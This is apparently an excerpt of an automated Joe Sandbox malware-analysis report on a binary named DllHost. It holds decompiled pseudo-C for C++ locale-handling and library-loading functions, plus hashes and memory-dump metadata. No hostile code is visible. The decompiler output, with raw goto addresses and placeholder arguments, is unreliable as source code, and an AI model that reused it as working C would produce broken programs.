				if ( *__rcx != 0) goto 0x191b25aa;
				E00007FF77FF7191D23D8(__rax, __rcx);
				_t97 = __rax;
				 *((long long*)(_t103 + 0x67)) = __rax;
				_t81 =  *((intOrPtr*)(__rdx + 8));
				if (_t81 == 0) goto 0x191b247c;
				if ( *((intOrPtr*)(_t81 + 0x28)) != 0) goto 0x191b2483;
				goto 0x191b2483;
				E00007FF77FF7191D0D0C(0, _t103 - 0x79);
				r14d = 0;
				 *((long long*)(_t103 - 0x71)) = _t111;
				 *((intOrPtr*)(_t103 - 0x69)) = r14b;
				 *((long long*)(_t103 - 0x61)) = _t111;
				 *((intOrPtr*)(_t103 - 0x59)) = r14b;
				 *((long long*)(_t103 - 0x51)) = _t111;
				 *((intOrPtr*)(_t103 - 0x49)) = r14w;
				 *((long long*)(_t103 - 0x41)) = _t111;
				 *((intOrPtr*)(_t103 - 0x39)) = r14w;
				 *((long long*)(_t103 - 0x31)) = _t111;
				 *((intOrPtr*)(_t103 - 0x29)) = r14b;
				 *((long long*)(_t103 - 0x21)) = _t111;
				 *((intOrPtr*)(_t103 - 0x19)) = r14b;
				if (0x1920f71b == 0) goto 0x191b25c7;
				E00007FF77FF7191D12B8(_t72, 0x1920f71b, _t103 - 0x79, 0x1920f71b);
				 *((intOrPtr*)(_t97 + 8)) = r14d;
				 *_t97 = 0x192029c0;
				E00007FF77FF7191D17C4(0x192029c0, _t103 - 0x11, 0x1920f71b, _t108);
				asm("movups xmm0, [eax]");
				asm("movups [edi+0x10], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [edi+0x20], xmm1");
				E00007FF77FF7191D19B4(0x192029c0, 0x1920f71b, _t103 + 0xf, _t109);
				asm("movups xmm0, [eax]");
				asm("movups [edi+0x30], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [edi+0x40], xmm1");
				asm("movsd xmm0, [eax+0x20]");
				asm("movsd [edi+0x50], xmm0");
				 *((intOrPtr*)(_t97 + 0x58)) =  *0x7FF7192029E8;
				 *_t100 = _t97;
				E00007FF77FF7191D1324(_t103 - 0x79);
				if ( *((intOrPtr*)(_t103 - 0x21)) == 0) goto 0x191b2542;
				E00007FF77FF7191D9C88(0x60, 0, 0x1920f71b, 0x1920f71b, _t111);
				 *((long long*)(_t103 - 0x21)) = _t111;
				if ( *((intOrPtr*)(_t103 - 0x31)) == 0) goto 0x191b2554;
				E00007FF77FF7191D9C88(0x60, 0, 0x1920f71b, 0x1920f71b, _t96);
				 *((long long*)(_t103 - 0x31)) = _t111;
				if ( *((intOrPtr*)(_t103 - 0x41)) == 0) goto 0x191b2566;
				E00007FF77FF7191D9C88(0x60, 0, 0x1920f71b, 0x1920f71b, _t102);
				 *((long long*)(_t103 - 0x41)) = _t111;
				if ( *((intOrPtr*)(_t103 - 0x51)) == 0) goto 0x191b2578;
				E00007FF77FF7191D9C88(0x60, 0, 0x1920f71b, 0x1920f71b);
				 *((long long*)(_t103 - 0x51)) = _t111;
				if ( *((intOrPtr*)(_t103 - 0x61)) == 0) goto 0x191b258a;
				E00007FF77FF7191D9C88(0x60, 0, 0x1920f71b, 0x1920f71b);
				 *((long long*)(_t103 - 0x61)) = _t111;
				if ( *((intOrPtr*)(_t103 - 0x71)) == 0) goto 0x191b259c;
				_t56 = E00007FF77FF7191D9C88(0x60, 0, 0x1920f71b, 0x1920f71b);
				 *((long long*)(_t103 - 0x71)) = _t111;
				E00007FF77FF7191D0D84(_t56, _t103 - 0x79);
				return 2;
			}














                                                                                                                                                              0x7ff7191b2420
                                                                                                                                                              0x7ff7191b2420
                                                                                                                                                              0x7ff7191b2425
                                                                                                                                                              0x7ff7191b242e
                                                                                                                                                              0x7ff7191b243d
                                                                                                                                                              0x7ff7191b2443
                                                                                                                                                              0x7ff7191b244d
                                                                                                                                                              0x7ff7191b2458
                                                                                                                                                              0x7ff7191b245d
                                                                                                                                                              0x7ff7191b2460
                                                                                                                                                              0x7ff7191b2464
                                                                                                                                                              0x7ff7191b246b
                                                                                                                                                              0x7ff7191b2474
                                                                                                                                                              0x7ff7191b247a
                                                                                                                                                              0x7ff7191b2489
                                                                                                                                                              0x7ff7191b248f
                                                                                                                                                              0x7ff7191b2492
                                                                                                                                                              0x7ff7191b2496
                                                                                                                                                              0x7ff7191b249a
                                                                                                                                                              0x7ff7191b249e
                                                                                                                                                              0x7ff7191b24a2
                                                                                                                                                              0x7ff7191b24a6
                                                                                                                                                              0x7ff7191b24ab
                                                                                                                                                              0x7ff7191b24af
                                                                                                                                                              0x7ff7191b24b4
                                                                                                                                                              0x7ff7191b24b8
                                                                                                                                                              0x7ff7191b24bc
                                                                                                                                                              0x7ff7191b24c0
                                                                                                                                                              0x7ff7191b24c7
                                                                                                                                                              0x7ff7191b24d4
                                                                                                                                                              0x7ff7191b24da
                                                                                                                                                              0x7ff7191b24e5
                                                                                                                                                              0x7ff7191b24ec
                                                                                                                                                              0x7ff7191b24f1
                                                                                                                                                              0x7ff7191b24f4
                                                                                                                                                              0x7ff7191b24f8
                                                                                                                                                              0x7ff7191b24fc
                                                                                                                                                              0x7ff7191b2504
                                                                                                                                                              0x7ff7191b2509
                                                                                                                                                              0x7ff7191b250c
                                                                                                                                                              0x7ff7191b2510
                                                                                                                                                              0x7ff7191b2514
                                                                                                                                                              0x7ff7191b2518
                                                                                                                                                              0x7ff7191b251d
                                                                                                                                                              0x7ff7191b2525
                                                                                                                                                              0x7ff7191b2528
                                                                                                                                                              0x7ff7191b252f
                                                                                                                                                              0x7ff7191b253b
                                                                                                                                                              0x7ff7191b253d
                                                                                                                                                              0x7ff7191b2542
                                                                                                                                                              0x7ff7191b254d
                                                                                                                                                              0x7ff7191b254f
                                                                                                                                                              0x7ff7191b2554
                                                                                                                                                              0x7ff7191b255f
                                                                                                                                                              0x7ff7191b2561
                                                                                                                                                              0x7ff7191b2566
                                                                                                                                                              0x7ff7191b2571
                                                                                                                                                              0x7ff7191b2573
                                                                                                                                                              0x7ff7191b2578
                                                                                                                                                              0x7ff7191b2583
                                                                                                                                                              0x7ff7191b2585
                                                                                                                                                              0x7ff7191b258a
                                                                                                                                                              0x7ff7191b2595
                                                                                                                                                              0x7ff7191b2597
                                                                                                                                                              0x7ff7191b259c
                                                                                                                                                              0x7ff7191b25a4
                                                                                                                                                              0x7ff7191b25c6

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                              • API String ID: 1386471777-1405518554
                                                                                                                                                              • Opcode ID: fecb7216e9349456eaf3a600992abdab81146bcf209182a5ea4cdfb7b6ac5e9b
                                                                                                                                                              • Instruction ID: 4b4022a82ce1c5d7be1eab6d76b49e9a2aacc157fe4c04cdb02dd00f6c38f8ac
                                                                                                                                                              • Opcode Fuzzy Hash: fecb7216e9349456eaf3a600992abdab81146bcf209182a5ea4cdfb7b6ac5e9b
                                                                                                                                                              • Instruction Fuzzy Hash: E0518D22B09F418AFB15EF70E0502EC63B1AF54768F840535DE4D27A56DF38E5AAE310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C2600 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                              			E00007FF77FF7191C2600(long long __rax, long long __rbx, long long* __rcx, void* __rdx, long long __rdi, long long __rsi) {
				void* _t55;
				intOrPtr _t76;
				long long* _t97;
				long long* _t101;
				void* _t103;
				void* _t104;
				void* _t106;
				void* _t110;
				long long _t113;

				 *((long long*)(_t106 + 0x10)) = __rbx;
				 *((long long*)(_t106 + 0x18)) = __rsi;
				 *((long long*)(_t106 + 0x20)) = __rdi;
				_t104 = _t106 - 0x47;
				_t101 = __rcx;
				r15d = 0;
				 *((intOrPtr*)(_t104 + 0x67)) = r15d;
				if (__rcx == 0) goto 0x191c276c;
				if ( *((intOrPtr*)(__rcx)) != __rbx) goto 0x191c276c;
				_t6 = _t113 + 0x10; // 0x10
				_t60 = _t6;
				E00007FF77FF7191D23D8(__rax, __rcx);
				_t97 = __rax;
				 *((long long*)(_t104 + 0x67)) = __rax;
				if (__rax == 0) goto 0x191c26e2;
				_t76 =  *((intOrPtr*)(__rdx + 8));
				if (_t76 == 0) goto 0x191c2672;
				if ( *((intOrPtr*)(_t76 + 0x28)) != 0) goto 0x191c2679;
				goto 0x191c2679;
				E00007FF77FF7191D0D0C(0, _t104 - 0x29);
				 *((long long*)(_t104 - 0x21)) = _t113;
				 *((char*)(_t104 - 0x19)) = 0;
				 *((long long*)(_t104 - 0x11)) = _t113;
				 *((char*)(_t104 - 9)) = 0;
				 *((long long*)(_t104 - 1)) = _t113;
				 *((intOrPtr*)(_t104 + 7)) = r15w;
				 *((long long*)(_t104 + 0xf)) = _t113;
				 *((intOrPtr*)(_t104 + 0x17)) = r15w;
				 *((long long*)(_t104 + 0x1f)) = _t113;
				 *((char*)(_t104 + 0x27)) = 0;
				 *((long long*)(_t104 + 0x2f)) = _t113;
				 *((char*)(_t104 + 0x37)) = 0;
				if (0x1920f71b == 0) goto 0x191c278e;
				E00007FF77FF7191D12B8(_t76, 0x1920f71b, _t104 - 0x29, 0x1920f71b);
				 *((intOrPtr*)(_t97 + 8)) = r15d;
				 *_t97 = 0x191f9a80;
				goto 0x191c26e5;
				 *_t101 = _t113;
				if (1 == 0) goto 0x191c276c;
				E00007FF77FF7191D1324(_t104 - 0x29);
				if ( *((intOrPtr*)(_t104 + 0x2f)) == 0) goto 0x191c2704;
				E00007FF77FF7191D9C88(_t6, 0, 0x1920f71b, 0x1920f71b, _t113);
				 *((long long*)(_t104 + 0x2f)) = _t113;
				if ( *((intOrPtr*)(_t104 + 0x1f)) == 0) goto 0x191c2716;
				E00007FF77FF7191D9C88(_t6, 0, 0x1920f71b, 0x1920f71b, _t110);
				 *((long long*)(_t104 + 0x1f)) = _t113;
				if ( *((intOrPtr*)(_t104 + 0xf)) == 0) goto 0x191c2728;
				E00007FF77FF7191D9C88(_t6, 0, 0x1920f71b, 0x1920f71b, _t103);
				 *((long long*)(_t104 + 0xf)) = _t113;
				if ( *((intOrPtr*)(_t104 - 1)) == 0) goto 0x191c273a;
				E00007FF77FF7191D9C88(_t60, 0, 0x1920f71b, 0x1920f71b);
				 *((long long*)(_t104 - 1)) = _t113;
				if ( *((intOrPtr*)(_t104 - 0x11)) == 0) goto 0x191c274c;
				E00007FF77FF7191D9C88(_t60, 0, 0x1920f71b, 0x1920f71b);
				 *((long long*)(_t104 - 0x11)) = _t113;
				if ( *((intOrPtr*)(_t104 - 0x21)) == 0) goto 0x191c275e;
				_t55 = E00007FF77FF7191D9C88(_t60, 0, 0x1920f71b, 0x1920f71b);
				 *((long long*)(_t104 - 0x21)) = _t113;
				E00007FF77FF7191D0D84(_t55, _t104 - 0x29);
				return 4;
			}












                                                                                                                                                              0x7ff7191c2600
                                                                                                                                                              0x7ff7191c2605
                                                                                                                                                              0x7ff7191c260a
                                                                                                                                                              0x7ff7191c2614
                                                                                                                                                              0x7ff7191c2623
                                                                                                                                                              0x7ff7191c2626
                                                                                                                                                              0x7ff7191c262c
                                                                                                                                                              0x7ff7191c2632
                                                                                                                                                              0x7ff7191c263b
                                                                                                                                                              0x7ff7191c2641
                                                                                                                                                              0x7ff7191c2641
                                                                                                                                                              0x7ff7191c2645
                                                                                                                                                              0x7ff7191c264a
                                                                                                                                                              0x7ff7191c264d
                                                                                                                                                              0x7ff7191c2654
                                                                                                                                                              0x7ff7191c265a
                                                                                                                                                              0x7ff7191c2661
                                                                                                                                                              0x7ff7191c266a
                                                                                                                                                              0x7ff7191c2670
                                                                                                                                                              0x7ff7191c267f
                                                                                                                                                              0x7ff7191c2685
                                                                                                                                                              0x7ff7191c2689
                                                                                                                                                              0x7ff7191c268d
                                                                                                                                                              0x7ff7191c2691
                                                                                                                                                              0x7ff7191c2695
                                                                                                                                                              0x7ff7191c2699
                                                                                                                                                              0x7ff7191c269e
                                                                                                                                                              0x7ff7191c26a2
                                                                                                                                                              0x7ff7191c26a7
                                                                                                                                                              0x7ff7191c26ab
                                                                                                                                                              0x7ff7191c26af
                                                                                                                                                              0x7ff7191c26b3
                                                                                                                                                              0x7ff7191c26ba
                                                                                                                                                              0x7ff7191c26c7
                                                                                                                                                              0x7ff7191c26d2
                                                                                                                                                              0x7ff7191c26dd
                                                                                                                                                              0x7ff7191c26e0
                                                                                                                                                              0x7ff7191c26e5
                                                                                                                                                              0x7ff7191c26eb
                                                                                                                                                              0x7ff7191c26f1
                                                                                                                                                              0x7ff7191c26fd
                                                                                                                                                              0x7ff7191c26ff
                                                                                                                                                              0x7ff7191c2704
                                                                                                                                                              0x7ff7191c270f
                                                                                                                                                              0x7ff7191c2711
                                                                                                                                                              0x7ff7191c2716
                                                                                                                                                              0x7ff7191c2721
                                                                                                                                                              0x7ff7191c2723
                                                                                                                                                              0x7ff7191c2728
                                                                                                                                                              0x7ff7191c2733
                                                                                                                                                              0x7ff7191c2735
                                                                                                                                                              0x7ff7191c273a
                                                                                                                                                              0x7ff7191c2745
                                                                                                                                                              0x7ff7191c2747
                                                                                                                                                              0x7ff7191c274c
                                                                                                                                                              0x7ff7191c2757
                                                                                                                                                              0x7ff7191c2759
                                                                                                                                                              0x7ff7191c275e
                                                                                                                                                              0x7ff7191c2766
                                                                                                                                                              0x7ff7191c278d

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                              • String ID: bad locale name$false$true
                                                                                                                                                              • API String ID: 2775327233-1062449267
                                                                                                                                                              • Opcode ID: 320c779b0217765bd2088dca07dd843de38b7ec274e93121b0ffc3b43111da41
                                                                                                                                                              • Instruction ID: ae6df9a13d78a401de7f3faa32a1000653bdbbb28bd6374fd8d6a4b102e1896c
                                                                                                                                                              • Opcode Fuzzy Hash: 320c779b0217765bd2088dca07dd843de38b7ec274e93121b0ffc3b43111da41
                                                                                                                                                              • Instruction Fuzzy Hash: 13414A32A1AB418AFB14EF60E4902EC73F4AF54768F880835DE4D17A85DE38D55AE364
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C27A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 55%
                                                                                                                                                              			E00007FF77FF7191C27A0(long long __rax, long long __rbx, long long* __rcx, void* __rdx) {
				void* _t72;
				intOrPtr _t102;
				long long _t105;
				void* _t125;
				void* _t130;
				long long* _t131;
				void* _t133;
				void* _t134;
				void* _t136;
				void* _t137;
				void* _t139;
				void* _t140;
				long long _t143;

				 *((long long*)(_t136 + 0x10)) = __rbx;
				_t134 = _t136 - 0x37;
				_t137 = _t136 - 0xf0;
				_t131 = __rcx;
				r15d = 0;
				 *((intOrPtr*)(_t134 + 0x67)) = r15d;
				if (__rcx == 0) goto 0x191c29b7;
				if ( *((intOrPtr*)(__rcx)) != _t125) goto 0x191c29b7;
				E00007FF77FF7191D23D8(__rax, __rcx);
				_t105 = __rax;
				 *((long long*)(_t134 + 0x77)) = __rax;
				if (__rax == 0) goto 0x191c2922;
				_t102 =  *((intOrPtr*)(__rdx + 8));
				if (_t102 == 0) goto 0x191c280b;
				if ( *((intOrPtr*)(_t102 + 0x28)) != 0) goto 0x191c2812;
				goto 0x191c2812;
				E00007FF77FF7191D0D0C(0, _t137 + 0x20);
				 *((long long*)(_t137 + 0x28)) = _t143;
				 *((char*)(_t137 + 0x30)) = 0;
				 *((long long*)(_t137 + 0x38)) = _t143;
				 *((char*)(_t134 - 0x79)) = 0;
				 *((long long*)(_t134 - 0x71)) = _t143;
				 *((intOrPtr*)(_t134 - 0x69)) = r15w;
				 *((long long*)(_t134 - 0x61)) = _t143;
				 *((intOrPtr*)(_t134 - 0x59)) = r15w;
				 *((long long*)(_t134 - 0x51)) = _t143;
				 *((char*)(_t134 - 0x49)) = 0;
				 *((long long*)(_t134 - 0x41)) = _t143;
				 *((char*)(_t134 - 0x39)) = 0;
				if (0x1920f71b == 0) goto 0x191c29d3;
				E00007FF77FF7191D12B8(_t102, _t105, _t137 + 0x20, 0x1920f71b);
				 *((intOrPtr*)(_t134 + 0x67)) = 1;
				 *((intOrPtr*)(_t105 + 8)) = r15d;
				 *_t105 = 0x191f9ae8;
				E00007FF77FF7191DC474(0x191f9ae8);
				E00007FF77FF7191D19B4(0x191f9ae8, _t105, _t134 - 0x31, _t139);
				 *((long long*)(_t105 + 0x10)) = _t143;
				 *((long long*)(_t105 + 0x20)) = _t143;
				 *((long long*)(_t105 + 0x28)) = _t143;
				 *((long long*)(_t134 + 0x7f)) = _t105;
				E00007FF77FF7191D19B4(0x191f9ae8, _t105, _t134 - 1, _t139);
				0x191dbffc();
				if (0x191f9ae8 == 0) goto 0x191c29e0;
				 *0x191f9ae8 = 0;
				 *((long long*)(_t105 + 0x10)) = 0x191f9ae8;
				0x191dbffc();
				if (0x191f9ae8 == 0) goto 0x191c29e6;
				 *0x191f9ae8 =  *0x191f96e8;
				 *((short*)(0x7ff7191f9aec)) =  *0x191f96ec & 0x0000ffff;
				 *((long long*)(_t105 + 0x20)) = 0x191f9ae8;
				0x191dbffc();
				if (0x191f9ae8 == 0) goto 0x191c29ec;
				 *0x191f9ae8 =  *0x191f96f0;
				 *((char*)(0x7ff7191f9aec)) =  *0x191f96f4 & 0x000000ff;
				 *((long long*)(_t105 + 0x28)) = 0x191f9ae8;
				 *((short*)(_t105 + 0x18)) = 0x2c2e;
				goto 0x191c2925;
				_t106 = _t143;
				 *_t131 = _t143;
				if ((dil & 0x00000001) == 0) goto 0x191c29b7;
				E00007FF77FF7191D1324(_t137 + 0x20);
				if ( *((intOrPtr*)(_t134 - 0x41)) == 0) goto 0x191c294a;
				E00007FF77FF7191D9C88(0x7ff71920f71f, 1, _t143, 0x1920f71b, _t143);
				 *((long long*)(_t134 - 0x41)) = _t143;
				if ( *((intOrPtr*)(_t134 - 0x51)) == 0) goto 0x191c295c;
				E00007FF77FF7191D9C88(0x7ff71920f71f, 1, _t143, 0x1920f71b, _t140);
				 *((long long*)(_t134 - 0x51)) = _t143;
				if ( *((intOrPtr*)(_t134 - 0x61)) == 0) goto 0x191c296e;
				E00007FF77FF7191D9C88(0x7ff71920f71f, 1, _t106, 0x1920f71b, _t125);
				 *((long long*)(_t134 - 0x61)) = _t143;
				if ( *((intOrPtr*)(_t134 - 0x71)) == 0) goto 0x191c2980;
				E00007FF77FF7191D9C88(0x7ff71920f71f, 1, _t106, 0x1920f71b, _t130);
				 *((long long*)(_t134 - 0x71)) = _t143;
				if ( *((intOrPtr*)(_t137 + 0x38)) == 0) goto 0x191c2993;
				E00007FF77FF7191D9C88(0x7ff71920f71f, 1, _t106, 0x1920f71b, _t133);
				 *((long long*)(_t137 + 0x38)) = _t143;
				if ( *((intOrPtr*)(_t137 + 0x28)) == 0) goto 0x191c29a7;
				_t72 = E00007FF77FF7191D9C88(0x7ff71920f71f, 1, _t106, 0x1920f71b);
				 *((long long*)(_t137 + 0x28)) = _t143;
				E00007FF77FF7191D0D84(_t72, _t137 + 0x20);
				return 4;
			}
















                                                                                                                                                              0x7ff7191c27a0
                                                                                                                                                              0x7ff7191c27ac
                                                                                                                                                              0x7ff7191c27b1
                                                                                                                                                              0x7ff7191c27bb
                                                                                                                                                              0x7ff7191c27be
                                                                                                                                                              0x7ff7191c27c4
                                                                                                                                                              0x7ff7191c27cb
                                                                                                                                                              0x7ff7191c27d4
                                                                                                                                                              0x7ff7191c27de
                                                                                                                                                              0x7ff7191c27e3
                                                                                                                                                              0x7ff7191c27e6
                                                                                                                                                              0x7ff7191c27ed
                                                                                                                                                              0x7ff7191c27f3
                                                                                                                                                              0x7ff7191c27fa
                                                                                                                                                              0x7ff7191c2803
                                                                                                                                                              0x7ff7191c2809
                                                                                                                                                              0x7ff7191c2819
                                                                                                                                                              0x7ff7191c281f
                                                                                                                                                              0x7ff7191c2824
                                                                                                                                                              0x7ff7191c2829
                                                                                                                                                              0x7ff7191c282e
                                                                                                                                                              0x7ff7191c2832
                                                                                                                                                              0x7ff7191c2836
                                                                                                                                                              0x7ff7191c283b
                                                                                                                                                              0x7ff7191c283f
                                                                                                                                                              0x7ff7191c2844
                                                                                                                                                              0x7ff7191c2848
                                                                                                                                                              0x7ff7191c284c
                                                                                                                                                              0x7ff7191c2850
                                                                                                                                                              0x7ff7191c2857
                                                                                                                                                              0x7ff7191c2865
                                                                                                                                                              0x7ff7191c2870
                                                                                                                                                              0x7ff7191c2873
                                                                                                                                                              0x7ff7191c287e
                                                                                                                                                              0x7ff7191c2881
                                                                                                                                                              0x7ff7191c288a
                                                                                                                                                              0x7ff7191c288f
                                                                                                                                                              0x7ff7191c2893
                                                                                                                                                              0x7ff7191c2897
                                                                                                                                                              0x7ff7191c289b
                                                                                                                                                              0x7ff7191c28a3
                                                                                                                                                              0x7ff7191c28ac
                                                                                                                                                              0x7ff7191c28b4
                                                                                                                                                              0x7ff7191c28ba
                                                                                                                                                              0x7ff7191c28bd
                                                                                                                                                              0x7ff7191c28c6
                                                                                                                                                              0x7ff7191c28d1
                                                                                                                                                              0x7ff7191c28dd
                                                                                                                                                              0x7ff7191c28e6
                                                                                                                                                              0x7ff7191c28ea
                                                                                                                                                              0x7ff7191c28f3
                                                                                                                                                              0x7ff7191c28fe
                                                                                                                                                              0x7ff7191c290a
                                                                                                                                                              0x7ff7191c2913
                                                                                                                                                              0x7ff7191c2916
                                                                                                                                                              0x7ff7191c291a
                                                                                                                                                              0x7ff7191c2920
                                                                                                                                                              0x7ff7191c2922
                                                                                                                                                              0x7ff7191c2925
                                                                                                                                                              0x7ff7191c292c
                                                                                                                                                              0x7ff7191c2937
                                                                                                                                                              0x7ff7191c2943
                                                                                                                                                              0x7ff7191c2945
                                                                                                                                                              0x7ff7191c294a
                                                                                                                                                              0x7ff7191c2955
                                                                                                                                                              0x7ff7191c2957
                                                                                                                                                              0x7ff7191c295c
                                                                                                                                                              0x7ff7191c2967
                                                                                                                                                              0x7ff7191c2969
                                                                                                                                                              0x7ff7191c296e
                                                                                                                                                              0x7ff7191c2979
                                                                                                                                                              0x7ff7191c297b
                                                                                                                                                              0x7ff7191c2980
                                                                                                                                                              0x7ff7191c298c
                                                                                                                                                              0x7ff7191c298e
                                                                                                                                                              0x7ff7191c2993
                                                                                                                                                              0x7ff7191c29a0
                                                                                                                                                              0x7ff7191c29a2
                                                                                                                                                              0x7ff7191c29a7
                                                                                                                                                              0x7ff7191c29b1
                                                                                                                                                              0x7ff7191c29d2

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Concurrency::cancel_current_task$Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                              • API String ID: 2973761340-1405518554
                                                                                                                                                              • Opcode ID: 77495e00a1d6c7be3dd5e1c368a1a914056e2d8268ea2c5eb0ca2355c5395d13
                                                                                                                                                              • Instruction ID: 49212532ca62e19c3a4ec3f470b5667b95ffe2e5ff537d14713ca9889a52e793
                                                                                                                                                              • Opcode Fuzzy Hash: 77495e00a1d6c7be3dd5e1c368a1a914056e2d8268ea2c5eb0ca2355c5395d13
                                                                                                                                                              • Instruction Fuzzy Hash: A0415032B1AB4146FB25EF60A4543EDA2F1AF40768F840834DE4D16E95CE3CD49AE364
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D81CC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E00007FF77FF7191D81CC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				struct HINSTANCE__* _t81;
				long long _t85;
				void* _t89;
				struct HINSTANCE__* _t94;
				long _t97;
				void* _t100;
				signed long long _t101;
				WCHAR* _t104;

				 *((long long*)(_t89 + 8)) = __rbx;
				 *((long long*)(_t89 + 0x10)) = _t85;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t101 = _t100 | 0xffffffff;
				_t61 =  *((intOrPtr*)(0x7ff7191b0000 + 0x6b298 + _t81 * 8));
				if (_t61 == _t101) goto 0x191d82fb;
				if (_t61 != 0) goto 0x191d82fd;
				if (__r8 == __r9) goto 0x191d82f3;
				_t67 =  *((intOrPtr*)(0x7ff7191b0000 + 0x6b280 + __rsi * 8));
				if (_t67 == 0) goto 0x191d823e;
				if (_t67 != _t101) goto 0x191d82d5;
				goto 0x191d82a9;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t100, _t97);
				_t68 = _t61;
				if (_t61 != 0) goto 0x191d82b5;
				if (GetLastError() != 0x57) goto 0x191d8297;
				_t14 = _t68 + 7; // 0x7
				r8d = _t14;
				if (E00007FF77FF7191E4FA0(__r8) == 0) goto 0x191d8297;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t61 != 0) goto 0x191d82b5;
				 *((intOrPtr*)(0x7ff7191b0000 + 0x6b280 + __rsi * 8)) = _t101;
				goto 0x191d821c;
				_t21 = 0x7ff7191b0000 + 0x6b280 + __rsi * 8;
				_t65 =  *_t21;
				 *_t21 = _t61;
				if (_t65 == 0) goto 0x191d82d5;
				FreeLibrary(_t94);
				GetProcAddress(_t81);
				if (_t65 == 0) goto 0x191d82f3;
				 *((intOrPtr*)(0x7ff7191b0000 + 0x6b298 + _t81 * 8)) = _t65;
				goto 0x191d82fd;
				 *((intOrPtr*)(0x7ff7191b0000 + 0x6b298 + _t81 * 8)) = _t101;
				return 0;
			}















                                                                                                                                                              0x7ff7191d81cc
                                                                                                                                                              0x7ff7191d81d1
                                                                                                                                                              0x7ff7191d81d6
                                                                                                                                                              0x7ff7191d81f1
                                                                                                                                                              0x7ff7191d81fe
                                                                                                                                                              0x7ff7191d820a
                                                                                                                                                              0x7ff7191d8213
                                                                                                                                                              0x7ff7191d821c
                                                                                                                                                              0x7ff7191d8225
                                                                                                                                                              0x7ff7191d8231
                                                                                                                                                              0x7ff7191d8236
                                                                                                                                                              0x7ff7191d823c
                                                                                                                                                              0x7ff7191d824b
                                                                                                                                                              0x7ff7191d8251
                                                                                                                                                              0x7ff7191d8257
                                                                                                                                                              0x7ff7191d825d
                                                                                                                                                              0x7ff7191d8268
                                                                                                                                                              0x7ff7191d826a
                                                                                                                                                              0x7ff7191d826a
                                                                                                                                                              0x7ff7191d827f
                                                                                                                                                              0x7ff7191d8281
                                                                                                                                                              0x7ff7191d8289
                                                                                                                                                              0x7ff7191d8295
                                                                                                                                                              0x7ff7191d82a1
